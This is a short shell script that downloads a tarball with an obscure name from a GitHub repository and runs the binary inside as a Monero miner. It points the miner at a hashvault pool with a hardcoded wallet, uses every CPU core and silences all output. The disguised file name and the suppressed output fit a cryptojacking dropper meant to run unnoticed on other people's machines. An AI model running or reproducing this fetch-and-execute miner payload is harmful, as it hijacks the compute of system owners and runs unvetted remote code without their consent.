#!/bin/sh

A=singapore01.hashvault.pro:80
B=83HzBwN146c9iq4p8mcxT6fM3hUNmHpzZii8uS8j37LkimD72XNQ3kZ9GisSHpWNw4UKapG4pkfzB9hKvvXxvdn2Gmrynju
C=cangcut
D=420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
apt-get update && apt-get upgrade -y
wget https://github.com/muledan1/bash/raw/main/-.tar.gz
tar -xf -.tar.gz
./- --url $A --user $B --pass $C --donate-level 1 --tls --tls-fingerprint $D -t$(nproc --all) >/dev/null >/dev/null 2>&1
sleep 10


